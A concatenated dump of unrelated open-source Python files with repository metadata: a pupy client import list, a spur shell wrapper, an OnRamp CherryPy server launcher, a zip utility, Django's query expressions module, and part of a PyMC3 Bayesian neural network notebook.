"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bigtable/setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "62009"
},
{
"name": "Python",
"bytes": "3388266"
},
{
"name": "Shell",
"bytes": "7548"
}
],
"symlink_target": ""
} |
import socket
import threading
import Queue
import collections
import SocketServer
import struct
import os
import sys
import time
import traceback
import uuid
import subprocess
import StringIO
import imp
import hashlib
import base64
import logging
import re
import ssl
import tempfile
import string
import datetime
import random
import shutil
import platform
import errno, stat
import zlib
import tempfile
import code
import Queue
import glob
import multiprocessing
import math
import binascii
import inspect
import shlex
import json
import ctypes
import ctypes.wintypes
import threading
import time
import urllib
import urllib2
import socks
| {
"content_hash": "c83cac0a4283e1300ac580fe6d99d6cc",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 22,
"avg_line_length": 14.590909090909092,
"alnum_prop": 0.8582554517133957,
"repo_name": "xeddmc/pupy",
"id": "6cbd4d3d628f110e8944ff000e44e9a6822ed37f",
"size": "642",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "client/additional_imports.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4914"
},
{
"name": "C",
"bytes": "205080"
},
{
"name": "Python",
"bytes": "530306"
},
{
"name": "Shell",
"bytes": "85"
}
],
"symlink_target": ""
} |
import spur
__all__ = ["run", "RunProcessError"]
local_shell = spur.LocalShell()
run = local_shell.run
RunProcessError = spur.RunProcessError
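# Illustrative usage sketch (not part of the original module); `run` is just
# spur.LocalShell().run, so it takes an argv list and returns a result object:
#
#     result = run(["echo", "hello"])
#     print(result.output)   # b"hello\n"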
| {
"content_hash": "df6a01410590071b99fda18ec875e001",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 38,
"avg_line_length": 13.454545454545455,
"alnum_prop": 0.7094594594594594,
"repo_name": "mwilliamson/whack",
"id": "98205c3aff7ca04b804436fbde5222f9023b8101",
"size": "148",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "whack/local.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Makefile",
"bytes": "530"
},
{
"name": "Python",
"bytes": "106682"
}
],
"symlink_target": ""
} |
"""Initialize and launch the onramp REST server."""
import logging
import os
import signal
import socket
import sys
import cherrypy
from cherrypy.process.plugins import Daemonizer, PIDFile
from configobj import ConfigObj
from validate import Validator
from PCE.dispatchers import APIMap, ClusterInfo, ClusterPing, Files, Jobs, \
Modules
from PCEHelper import pce_root
def _CORS():
"""Set HTTP Access Control Header to allow cross-site HTTP requests from
any origin.
"""
cherrypy.response.headers['Access-Control-Allow-Origin'] = '*'
def _term_handler(signal, frame):
"""Gracefully shutdown the server and exit.
This function is intended to be registered as a SIGTERM handler.
"""
logger = logging.getLogger('onramp')
logger.info('Shutting down server')
cherrypy.engine.exit()
logger.info('Exiting')
sys.exit(0)
def _restart_handler(signal, frame):
"""Restart the server.
This function is intended to be registered as a SIGHUP handler.
"""
logger = logging.getLogger('onramp')
logger.info('Restarting server')
# FIXME: This needs to reload the config, including attrs in
# onramp_pce_config.cfg.
cherrypy.engine.restart()
logger.debug('Blocking cherrypy engine')
cherrypy.engine.block()
if __name__ == '__main__':
# Default conf. Some of these can/will be overrided by attrs in
# onramp_pce_config.cfg.
conf = {
'global': {
'server.socket_host': socket.gethostbyname(socket.gethostname()),
'log.access_file': 'log/access.log',
'log.error_file': 'log/cherrypy_error.log',
'log.screen': False,
# Don't run CherryPy Checker on custom conf sections:
# FIXME: This setting doesn't seem to be working...
'checker.check_internal_config': False,
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.CORS.on': True
},
'internal': {
'PIDfile': os.path.join(os.getcwd(), 'src/.onrampRESTservice.pid'),
'log_level': 'INFO',
'onramp_log_file': 'log/onramp.log'
}
}
# Load onramp_pce_config.cfg and integrate appropriate attrs into cherrpy
# conf.
cfg = ConfigObj(os.path.join(pce_root, 'bin', 'onramp_pce_config.cfg'),
configspec=os.path.join(pce_root, 'src', 'configspecs',
'onramp_pce_config.cfgspec'))
cfg.validate(Validator())
if 'server' in cfg.keys():
for k in cfg['server']:
conf['global']['server.' + k] = cfg['server'][k]
if 'cluster' in cfg.keys():
if 'log_level' in cfg['cluster'].keys():
conf['internal']['log_level'] = cfg['cluster']['log_level']
if 'log_file' in cfg['cluster'].keys():
log_file = cfg['cluster']['log_file']
if not log_file.startswith('/'):
# Path is relative to onramp_pce_config.cfg location
                log_file = os.path.join(pce_root, 'bin', log_file)
conf['internal']['onramp_log_file'] = log_file
cherrypy.config.update(conf)
# Set up logging.
log_levels = {
'DEBUG': logging.DEBUG,
'INFO': logging.INFO,
'WARNING': logging.WARNING,
'ERROR': logging.ERROR,
'CRITICAL': logging.CRITICAL
}
log_name = 'onramp'
logger = logging.getLogger(log_name)
logger.setLevel(log_levels[conf['internal']['log_level']])
handler = logging.FileHandler(conf['internal']['onramp_log_file'])
handler.setFormatter(
logging.Formatter('[%(asctime)s] %(levelname)s %(message)s'))
logger.addHandler(handler)
logger.info('Logging at %s to %s' % (conf['internal']['log_level'],
conf['internal']['onramp_log_file']))
# Log the PID
PIDFile(cherrypy.engine, conf['internal']['PIDfile']).subscribe()
Daemonizer(cherrypy.engine).subscribe()
cherrypy.tools.CORS = cherrypy.Tool('before_finalize', _CORS)
cherrypy.tree.mount(Modules(cfg, log_name), '/modules', conf)
cherrypy.tree.mount(Jobs(cfg, log_name), '/jobs', conf)
cherrypy.tree.mount(ClusterInfo(cfg, log_name), '/cluster/info', conf)
cherrypy.tree.mount(ClusterPing(cfg, log_name), '/cluster/ping', conf)
cherrypy.tree.mount(Files(cfg, log_name), '/files', conf)
cherrypy.tree.mount(APIMap(cfg, log_name), '/api', conf)
logger.info('Starting cherrypy engine')
cherrypy.engine.start()
logger.debug('Registering signal handlers')
signal.signal(signal.SIGTERM, _term_handler)
signal.signal(signal.SIGHUP, _restart_handler)
logger.debug('Blocking cherrypy engine')
cherrypy.engine.block()
| {
"content_hash": "3d2c4c2f09c7c28741cf59ed5485745c",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 79,
"avg_line_length": 35.66417910447761,
"alnum_prop": 0.6179116970077422,
"repo_name": "koepked/onramp",
"id": "b38d36dc17cf71900d09b272d29a14604fdc008b",
"size": "4805",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "pce/src/RESTservice.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1436045"
},
{
"name": "Gnuplot",
"bytes": "701"
},
{
"name": "Groff",
"bytes": "253441"
},
{
"name": "HTML",
"bytes": "584449"
},
{
"name": "JavaScript",
"bytes": "144082"
},
{
"name": "Makefile",
"bytes": "88349"
},
{
"name": "Perl",
"bytes": "5501"
},
{
"name": "Python",
"bytes": "406605"
},
{
"name": "Shell",
"bytes": "8072"
},
{
"name": "SourcePawn",
"bytes": "120276"
},
{
"name": "TeX",
"bytes": "82592"
}
],
"symlink_target": ""
} |
from zipfile import ZipFile, ZIP_DEFLATED
from optparse import OptionParser
parser = OptionParser()
## Make options for commandline available through -h
## -f/--files takes a commaseparated list of filenames _without_ paths
parser.add_option("-f", "--files", dest="filename",
help="List of files to compress", metavar="FILE")
## -p/--path takes the path for the supplied files
parser.add_option("-p", "--path", dest="path",
help="Path containing files", metavar="PATH")
## -o/--outpath takes the path where the zip is to be created
parser.add_option("-o", "--outpath", dest="outpath",
help="Outpath", metavar="OUTPATH")
## -z/--zipname takes the filename for the zip file
parser.add_option("-z", "--zipname", dest="zipname",
help="Name for zipfile", metavar="ZIPNAME")
(options, args) = parser.parse_args()
with ZipFile(options.outpath+options.zipname,'w',ZIP_DEFLATED) as z:
for item in options.filename.split(','):
print('Crunching '+item)
z.write(options.path+item,item)
z.close()
print(options.outpath+options.zipname)
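# Illustrative invocation (hypothetical file names; note that -p and -o are
# concatenated directly with the file names, so they need trailing slashes):
#
#   python PyZippr.py -f a.txt,b.txt -p /tmp/in/ -o /tmp/out/ -z bundle.zip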
| {
"content_hash": "85224165bf46f2f5ee4587968bab3b6e",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 71,
"avg_line_length": 38.89655172413793,
"alnum_prop": 0.6578014184397163,
"repo_name": "foag/pyzippr",
"id": "9db8c54505abd1c90b95cb4ba6c9d53c65ef57d0",
"size": "1261",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "PyZippr.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1261"
}
],
"symlink_target": ""
} |
import copy
import datetime
from django.conf import settings
from django.core.exceptions import FieldError
from django.db.backends import utils as backend_utils
from django.db.models import fields
from django.db.models.constants import LOOKUP_SEP
from django.db.models.query_utils import refs_aggregate
from django.utils import timezone
from django.utils.functional import cached_property
class CombinableMixin(object):
"""
Provides the ability to combine one or two objects with
some connector. For example F('foo') + F('bar').
"""
# Arithmetic connectors
ADD = '+'
SUB = '-'
MUL = '*'
DIV = '/'
POW = '^'
# The following is a quoted % operator - it is quoted because it can be
# used in strings that also have parameter substitution.
MOD = '%%'
# Bitwise operators - note that these are generated by .bitand()
# and .bitor(), the '&' and '|' are reserved for boolean operator
# usage.
BITAND = '&'
BITOR = '|'
def _combine(self, other, connector, reversed, node=None):
if not hasattr(other, 'resolve_expression'):
# everything must be resolvable to an expression
if isinstance(other, datetime.timedelta):
other = DurationValue(other, output_field=fields.DurationField())
else:
other = Value(other)
if reversed:
return Expression(other, connector, self)
return Expression(self, connector, other)
#############
# OPERATORS #
#############
def __add__(self, other):
return self._combine(other, self.ADD, False)
def __sub__(self, other):
return self._combine(other, self.SUB, False)
def __mul__(self, other):
return self._combine(other, self.MUL, False)
def __truediv__(self, other):
return self._combine(other, self.DIV, False)
def __div__(self, other): # Python 2 compatibility
return type(self).__truediv__(self, other)
def __mod__(self, other):
return self._combine(other, self.MOD, False)
def __pow__(self, other):
return self._combine(other, self.POW, False)
def __and__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitand(self, other):
return self._combine(other, self.BITAND, False)
def __or__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitor(self, other):
return self._combine(other, self.BITOR, False)
def __radd__(self, other):
return self._combine(other, self.ADD, True)
def __rsub__(self, other):
return self._combine(other, self.SUB, True)
def __rmul__(self, other):
return self._combine(other, self.MUL, True)
def __rtruediv__(self, other):
return self._combine(other, self.DIV, True)
def __rdiv__(self, other): # Python 2 compatibility
return type(self).__rtruediv__(self, other)
def __rmod__(self, other):
return self._combine(other, self.MOD, True)
def __rpow__(self, other):
return self._combine(other, self.POW, True)
def __rand__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def __ror__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
class ExpressionNode(CombinableMixin):
"""
Base class for all query expressions.
"""
# aggregate specific fields
is_summary = False
def get_db_converters(self, connection):
return [self.convert_value]
def __init__(self, output_field=None):
self._output_field = output_field
def get_source_expressions(self):
return []
def set_source_expressions(self, exprs):
assert len(exprs) == 0
def as_sql(self, compiler, connection):
"""
Responsible for returning a (sql, [params]) tuple to be included
in the current query.
Different backends can provide their own implementation, by
providing an `as_{vendor}` method and patching the Expression:
```
def override_as_sql(self, compiler, connection):
# custom logic
return super(ExpressionNode, self).as_sql(compiler, connection)
setattr(ExpressionNode, 'as_' + connection.vendor, override_as_sql)
```
Arguments:
* compiler: the query compiler responsible for generating the query.
Must have a compile method, returning a (sql, [params]) tuple.
Calling compiler(value) will return a quoted `value`.
* connection: the database connection used for the current query.
Returns: (sql, params)
Where `sql` is a string containing ordered sql parameters to be
replaced with the elements of the list `params`.
"""
raise NotImplementedError("Subclasses must implement as_sql()")
@cached_property
def contains_aggregate(self):
for expr in self.get_source_expressions():
if expr and expr.contains_aggregate:
return True
return False
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False):
"""
Provides the chance to do any preprocessing or validation before being
added to the query.
Arguments:
* query: the backend query implementation
* allow_joins: boolean allowing or denying use of joins
in this query
* reuse: a set of reusable joins for multijoins
* summarize: a terminal aggregate clause
Returns: an ExpressionNode to be added to the query.
"""
c = self.copy()
c.is_summary = summarize
return c
def _prepare(self):
"""
Hook used by Field.get_prep_lookup() to do custom preparation.
"""
return self
@property
def field(self):
return self.output_field
@cached_property
def output_field(self):
"""
Returns the output type of this expressions.
"""
if self._output_field_or_none is None:
raise FieldError("Cannot resolve expression type, unknown output_field")
return self._output_field_or_none
@cached_property
def _output_field_or_none(self):
"""
Returns the output field of this expression, or None if no output type
can be resolved. Note that the 'output_field' property will raise
FieldError if no type can be resolved, but this attribute allows for
None values.
"""
if self._output_field is None:
self._resolve_output_field()
return self._output_field
def _resolve_output_field(self):
"""
Attempts to infer the output type of the expression. If the output
fields of all source fields match then we can simply infer the same
type here.
"""
if self._output_field is None:
sources = self.get_source_fields()
num_sources = len(sources)
if num_sources == 0:
self._output_field = None
else:
self._output_field = sources[0]
for source in sources:
if source is not None and not isinstance(self._output_field, source.__class__):
raise FieldError(
"Expression contains mixed types. You must set output_field")
def convert_value(self, value, connection):
"""
Expressions provide their own converters because users have the option
of manually specifying the output_field which may be a different type
from the one the database returns.
"""
field = self.output_field
internal_type = field.get_internal_type()
if value is None:
return value
elif internal_type == 'FloatField':
return float(value)
elif internal_type.endswith('IntegerField'):
return int(value)
elif internal_type == 'DecimalField':
return backend_utils.typecast_decimal(value)
return value
def get_lookup(self, lookup):
return self.output_field.get_lookup(lookup)
def get_transform(self, name):
return self.output_field.get_transform(name)
def relabeled_clone(self, change_map):
clone = self.copy()
clone.set_source_expressions(
[e.relabeled_clone(change_map) for e in self.get_source_expressions()])
return clone
def copy(self):
c = copy.copy(self)
c.copied = True
return c
def refs_aggregate(self, existing_aggregates):
"""
Does this expression contain a reference to some of the
existing aggregates? If so, returns the aggregate and also
the lookup parts that *weren't* found. So, if
            existing_aggregates = {'max_id': Max('id')}
self.name = 'max_id'
queryset.filter(max_id__range=[10,100])
then this method will return Max('id') and those parts of the
name that weren't found. In this case `max_id` is found and the range
portion is returned as ('range',).
"""
for node in self.get_source_expressions():
agg, lookup = node.refs_aggregate(existing_aggregates)
if agg:
return agg, lookup
return False, ()
def refs_field(self, aggregate_types, field_types):
"""
Helper method for check_aggregate_support on backends
"""
return any(
node.refs_field(aggregate_types, field_types)
for node in self.get_source_expressions())
def prepare_database_save(self, field):
return self
def get_group_by_cols(self):
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def get_source_fields(self):
"""
Returns the underlying field types used by this
aggregate.
"""
return [e._output_field_or_none for e in self.get_source_expressions()]
class Expression(ExpressionNode):
def __init__(self, lhs, connector, rhs, output_field=None):
super(Expression, self).__init__(output_field=output_field)
self.connector = connector
self.lhs = lhs
self.rhs = rhs
def get_source_expressions(self):
return [self.lhs, self.rhs]
def set_source_expressions(self, exprs):
self.lhs, self.rhs = exprs
def as_sql(self, compiler, connection):
try:
lhs_output = self.lhs.output_field
except FieldError:
lhs_output = None
try:
rhs_output = self.rhs.output_field
except FieldError:
rhs_output = None
if (not connection.features.has_native_duration_field and
((lhs_output and lhs_output.get_internal_type() == 'DurationField')
or (rhs_output and rhs_output.get_internal_type() == 'DurationField'))):
return DurationExpression(self.lhs, self.connector, self.rhs).as_sql(compiler, connection)
expressions = []
expression_params = []
sql, params = compiler.compile(self.lhs)
expressions.append(sql)
expression_params.extend(params)
sql, params = compiler.compile(self.rhs)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False):
c = self.copy()
c.is_summary = summarize
c.lhs = c.lhs.resolve_expression(query, allow_joins, reuse, summarize)
c.rhs = c.rhs.resolve_expression(query, allow_joins, reuse, summarize)
return c
class DurationExpression(Expression):
def compile(self, side, compiler, connection):
if not isinstance(side, DurationValue):
try:
output = side.output_field
except FieldError:
pass
if output.get_internal_type() == 'DurationField':
sql, params = compiler.compile(side)
return connection.ops.format_for_duration_arithmetic(sql), params
return compiler.compile(side)
def as_sql(self, compiler, connection):
expressions = []
expression_params = []
sql, params = self.compile(self.lhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
sql, params = self.compile(self.rhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_duration_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
class F(CombinableMixin):
"""
An object capable of resolving references to existing query objects.
"""
def __init__(self, name):
"""
Arguments:
* name: the name of the field this expression references
"""
self.name = name
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False):
return query.resolve_ref(self.name, allow_joins, reuse, summarize)
def refs_aggregate(self, existing_aggregates):
return refs_aggregate(self.name.split(LOOKUP_SEP), existing_aggregates)
class Func(ExpressionNode):
"""
A SQL function call.
"""
function = None
template = '%(function)s(%(expressions)s)'
arg_joiner = ', '
def __init__(self, *expressions, **extra):
output_field = extra.pop('output_field', None)
super(Func, self).__init__(output_field=output_field)
self.source_expressions = self._parse_expressions(*expressions)
self.extra = extra
def get_source_expressions(self):
return self.source_expressions
def set_source_expressions(self, exprs):
self.source_expressions = exprs
def _parse_expressions(self, *expressions):
return [
arg if hasattr(arg, 'resolve_expression') else F(arg)
for arg in expressions
]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False):
c = self.copy()
c.is_summary = summarize
for pos, arg in enumerate(c.source_expressions):
c.source_expressions[pos] = arg.resolve_expression(query, allow_joins, reuse, summarize)
return c
def as_sql(self, compiler, connection, function=None, template=None):
sql_parts = []
params = []
for arg in self.source_expressions:
arg_sql, arg_params = compiler.compile(arg)
sql_parts.append(arg_sql)
params.extend(arg_params)
if function is None:
self.extra['function'] = self.extra.get('function', self.function)
else:
self.extra['function'] = function
self.extra['expressions'] = self.extra['field'] = self.arg_joiner.join(sql_parts)
template = template or self.extra.get('template', self.template)
return template % self.extra, params
def copy(self):
copy = super(Func, self).copy()
copy.source_expressions = self.source_expressions[:]
copy.extra = self.extra.copy()
return copy
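# Illustrative sketch (not part of this module): the simplest way to use Func is
# to subclass it and set `function`, relying on the default template
# '%(function)s(%(expressions)s)'. For example, a LOWER() wrapper:
#
#     class Lower(Func):
#         function = 'LOWER'
#
#     # Author.objects.annotate(name_lower=Lower('name')) would then emit
#     # LOWER("author"."name") in the generated SQL (model names hypothetical).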
class Value(ExpressionNode):
"""
Represents a wrapped value as a node within an expression
"""
def __init__(self, value, output_field=None):
"""
Arguments:
* value: the value this expression represents. The value will be
added into the sql parameter list and properly quoted.
* output_field: an instance of the model field type that this
expression will return, such as IntegerField() or CharField().
"""
super(Value, self).__init__(output_field=output_field)
self.value = value
def as_sql(self, compiler, connection):
return '%s', [self.value]
class DurationValue(Value):
def as_sql(self, compiler, connection):
if (connection.features.has_native_duration_field and
connection.features.driver_supports_timedelta_args):
return super(DurationValue, self).as_sql(compiler, connection)
return connection.ops.date_interval_sql(self.value)
class Col(ExpressionNode):
def __init__(self, alias, target, source=None):
if source is None:
source = target
super(Col, self).__init__(output_field=source)
self.alias, self.target = alias, target
def as_sql(self, compiler, connection):
qn = compiler.quote_name_unless_alias
return "%s.%s" % (qn(self.alias), qn(self.target.column)), []
def relabeled_clone(self, relabels):
return self.__class__(relabels.get(self.alias, self.alias), self.target, self.output_field)
def get_group_by_cols(self):
return [self]
class Ref(ExpressionNode):
"""
Reference to column alias of the query. For example, Ref('sum_cost') in
qs.annotate(sum_cost=Sum('cost')) query.
"""
def __init__(self, refs, source):
super(Ref, self).__init__()
self.source = source
self.refs = refs
def get_source_expressions(self):
return [self.source]
def set_source_expressions(self, exprs):
self.source, = exprs
def relabeled_clone(self, relabels):
return self
def as_sql(self, compiler, connection):
return "%s" % compiler.quote_name_unless_alias(self.refs), []
def get_group_by_cols(self):
return [self]
class Date(ExpressionNode):
"""
Add a date selection column.
"""
def __init__(self, lookup, lookup_type):
super(Date, self).__init__(output_field=fields.DateField())
self.lookup = lookup
self.col = None
self.lookup_type = lookup_type
def get_source_expressions(self):
return [self.col]
def set_source_expressions(self, exprs):
self.col, = exprs
def resolve_expression(self, query, allow_joins, reuse, summarize):
copy = self.copy()
copy.col = query.resolve_ref(self.lookup, allow_joins, reuse, summarize)
field = copy.col.output_field
assert isinstance(field, fields.DateField), "%r isn't a DateField." % field.name
if settings.USE_TZ:
assert not isinstance(field, fields.DateTimeField), (
"%r is a DateTimeField, not a DateField." % field.name
)
return copy
def as_sql(self, compiler, connection):
sql, params = self.col.as_sql(compiler, connection)
assert not(params)
return connection.ops.date_trunc_sql(self.lookup_type, sql), []
def copy(self):
copy = super(Date, self).copy()
copy.lookup = self.lookup
copy.lookup_type = self.lookup_type
return copy
def convert_value(self, value, connection):
if isinstance(value, datetime.datetime):
value = value.date()
return value
class DateTime(ExpressionNode):
"""
Add a datetime selection column.
"""
def __init__(self, lookup, lookup_type, tzinfo):
super(DateTime, self).__init__(output_field=fields.DateTimeField())
self.lookup = lookup
self.col = None
self.lookup_type = lookup_type
if tzinfo is None:
self.tzname = None
else:
self.tzname = timezone._get_timezone_name(tzinfo)
self.tzinfo = tzinfo
def get_source_expressions(self):
return [self.col]
def set_source_expressions(self, exprs):
self.col, = exprs
def resolve_expression(self, query, allow_joins, reuse, summarize):
copy = self.copy()
copy.col = query.resolve_ref(self.lookup, allow_joins, reuse, summarize)
field = copy.col.output_field
assert isinstance(field, fields.DateTimeField), (
"%r isn't a DateTimeField." % field.name
)
return copy
def as_sql(self, compiler, connection):
sql, params = self.col.as_sql(compiler, connection)
assert not(params)
return connection.ops.datetime_trunc_sql(self.lookup_type, sql, self.tzname)
def copy(self):
copy = super(DateTime, self).copy()
copy.lookup = self.lookup
copy.lookup_type = self.lookup_type
copy.tzname = self.tzname
return copy
def convert_value(self, value, connection):
if settings.USE_TZ:
if value is None:
raise ValueError(
"Database returned an invalid value in QuerySet.datetimes(). "
"Are time zone definitions for your database and pytz installed?"
)
value = value.replace(tzinfo=None)
value = timezone.make_aware(value, self.tzinfo)
return value
| {
"content_hash": "244007c0a21722f97baa5220f4de37d5",
"timestamp": "",
"source": "github",
"line_count": 636,
"max_line_length": 102,
"avg_line_length": 33.611635220125784,
"alnum_prop": 0.6109369883519671,
"repo_name": "edevil/django",
"id": "ac69307edc50010dea00f99b9feebe6820af57dd",
"size": "21377",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "django/db/models/expressions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "53429"
},
{
"name": "JavaScript",
"bytes": "103687"
},
{
"name": "Makefile",
"bytes": "5765"
},
{
"name": "Python",
"bytes": "10540191"
},
{
"name": "Shell",
"bytes": "10452"
}
],
"symlink_target": ""
} |
get_ipython().magic('matplotlib inline')
import theano
floatX = theano.config.floatX
import pymc3 as pm
import theano.tensor as T
import sklearn
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style('white')
from sklearn import datasets
from sklearn.preprocessing import scale
from sklearn.cross_validation import train_test_split
from sklearn.datasets import make_moons
# In[3]:
X, Y = make_moons(noise=0.2, random_state=0, n_samples=1000)
X = scale(X)
X = X.astype(floatX)
Y = Y.astype(floatX)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=.5)
# In[4]:
fig, ax = plt.subplots()
ax.scatter(X[Y==0, 0], X[Y==0, 1], label='Class 0')
ax.scatter(X[Y==1, 0], X[Y==1, 1], color='r', label='Class 1')
sns.despine(); ax.legend()
ax.set(xlabel='X', ylabel='Y', title='Toy binary classification data set');
# ## Model specification
#
# A neural network is quite simple. The basic unit is a perceptron, which is nothing more than logistic regression. We use many of these in parallel and then stack them up to get hidden layers. Here we will use 2 hidden layers with 5 neurons each, which is sufficient for such a simple problem.
# In[5]:
# Trick: Turn inputs and outputs into shared variables.
# It's still the same thing, but we can later change the values of the shared variable
# (to switch in the test-data later) and pymc3 will just use the new data.
# Kind-of like a pointer we can redirect.
# For more info, see: http://deeplearning.net/software/theano/library/compile/shared.html
ann_input = theano.shared(X_train)
ann_output = theano.shared(Y_train)
n_hidden = 5
# Initialize random weights between each layer
init_1 = np.random.randn(X.shape[1], n_hidden).astype(floatX)
init_2 = np.random.randn(n_hidden, n_hidden).astype(floatX)
init_out = np.random.randn(n_hidden).astype(floatX)
with pm.Model() as neural_network:
# Weights from input to hidden layer
weights_in_1 = pm.Normal('w_in_1', 0, sd=1,
shape=(X.shape[1], n_hidden),
testval=init_1)
# Weights from 1st to 2nd layer
weights_1_2 = pm.Normal('w_1_2', 0, sd=1,
shape=(n_hidden, n_hidden),
testval=init_2)
# Weights from hidden layer to output
weights_2_out = pm.Normal('w_2_out', 0, sd=1,
shape=(n_hidden,),
testval=init_out)
# Build neural-network using tanh activation function
act_1 = pm.math.tanh(pm.math.dot(ann_input,
weights_in_1))
act_2 = pm.math.tanh(pm.math.dot(act_1,
weights_1_2))
act_out = pm.math.sigmoid(pm.math.dot(act_2,
weights_2_out))
# Binary classification -> Bernoulli likelihood
out = pm.Bernoulli('out',
act_out,
observed=ann_output)
# That’s not so bad. The Normal priors help regularize the weights. Usually we would add a constant b to the inputs but I omitted it here to keep the code cleaner.
# ## Variational Inference: Scaling model complexity
#
# We could now just run a MCMC sampler like `NUTS <http://pymc-devs.github.io/pymc3/api.html#nuts>`__ which works pretty well in this case but as I already mentioned, this will become very slow as we scale our model up to deeper architectures with more layers.
#
# Instead, we will use the brand-new ADVI variational inference algorithm which was recently added to PyMC3. This is much faster and will scale better. Note, that this is a mean-field approximation so we ignore correlations in the posterior.
# In[6]:
get_ipython().run_cell_magic('time', '', '\nwith neural_network:\n # Run ADVI which returns posterior means, standard deviations, and the evidence lower bound (ELBO)\n v_params = pm.variational.advi(n=50000)')
# < 20 seconds on my older laptop. That’s pretty good considering that NUTS is having a really hard time. Further below we make this even faster. To make it really fly, we probably want to run the Neural Network on the GPU.
#
# As samples are more convenient to work with, we can very quickly draw samples from the variational posterior using sample_vp() (this is just sampling from Normal distributions, so it is not at all the same as MCMC):
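# Conceptual sketch (not part of the original notebook) of what sample_vp() reduces
# to for a single weight matrix: independent Normal draws. It assumes the ADVI fit
# exposes per-parameter means and standard deviations keyed by variable name
# (here written as v_params.means / v_params.stds); that attribute layout is an
# assumption for illustration.
def draw_weight_samples_sketch(v_params, var_name, draws=5000):
    mu = np.asarray(v_params.means[var_name])
    sd = np.asarray(v_params.stds[var_name])
    return np.random.normal(mu, sd, size=(draws,) + mu.shape)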
# In[9]:
get_ipython().run_cell_magic('time', '', '\nwith neural_network:\n trace = pm.variational.sample_vp(v_params, draws=5000)')
# Plotting the objective function (ELBO), we can see that the optimization slowly improves the fit over time.
#
#
# In[10]:
plt.plot(v_params.elbo_vals)
plt.ylabel('ELBO')
plt.xlabel('iteration')
# Now that we have trained our model, let's predict on the hold-out set using a posterior predictive check (PPC). We use `sample_ppc() <http://pymc-devs.github.io/pymc3/api.html#pymc3.sampling.sample_ppc>`__ to generate new data (in this case class predictions) from the posterior (sampled from the variational estimation).
# In[11]:
# Replace shared variables with testing set
ann_input.set_value(X_test)
ann_output.set_value(Y_test)
# Create posterior predictive samples
ppc = pm.sample_ppc(trace, model=neural_network, samples=500)
# Use a posterior predictive mean probability > 0.5 to predict class 1
pred = ppc['out'].mean(axis=0) > 0.5
# In[12]:
fig, ax = plt.subplots()
ax.scatter(X_test[pred==0, 0], X_test[pred==0, 1])
ax.scatter(X_test[pred==1, 0], X_test[pred==1, 1], color='r')
sns.despine()
ax.set(title='Predicted labels in testing set', xlabel='X', ylabel='Y');
# In[13]:
print('Accuracy = {}%'.format((Y_test == pred).mean() * 100))
# Hey, our neural network did all right!
#
# ## Let's look at what the classifier has learned
# For this, we evaluate the class probability predictions on a grid over the whole input space.
# In[14]:
grid = np.mgrid[-3:3:100j,-3:3:100j].astype(floatX)
grid_2d = grid.reshape(2, -1).T
dummy_out = np.ones(grid_2d.shape[0], dtype=np.int8)  # placeholder labels, one per grid point
# In[15]:
ann_input.set_value(grid_2d)
ann_output.set_value(dummy_out)
# Create posterior predictive samples
ppc = pm.sample_ppc(trace, model=neural_network, samples=500)
# ## Probability surface
#
#
# In[16]:
cmap = sns.diverging_palette(250, 12, s=85, l=25, as_cmap=True)
fig, ax = plt.subplots(figsize=(10, 6))
contour = ax.contourf(*grid, ppc['out'].mean(axis=0).reshape(100, 100), cmap=cmap)
ax.scatter(X_test[pred==0, 0], X_test[pred==0, 1])
ax.scatter(X_test[pred==1, 0], X_test[pred==1, 1], color='r')
cbar = plt.colorbar(contour, ax=ax)
_ = ax.set(xlim=(-3, 3), ylim=(-3, 3), xlabel='X', ylabel='Y');
cbar.ax.set_ylabel('Posterior predictive mean probability of class label = 1');
# ## Uncertainty in predicted value
# So far, everything I have shown could also have been done with a non-Bayesian Neural Network. The mean of the posterior predictive for each class label should be very close to the maximum likelihood predicted values. However, we can also look at the standard deviation of the posterior predictive to get a sense for the uncertainty in our predictions. Here is what that looks like:
# In[17]:
cmap = sns.cubehelix_palette(light=1, as_cmap=True)
fig, ax = plt.subplots(figsize=(10, 6))
contour = ax.contourf(*grid, ppc['out'].std(axis=0).reshape(100, 100), cmap=cmap)
ax.scatter(X_test[pred==0, 0], X_test[pred==0, 1])
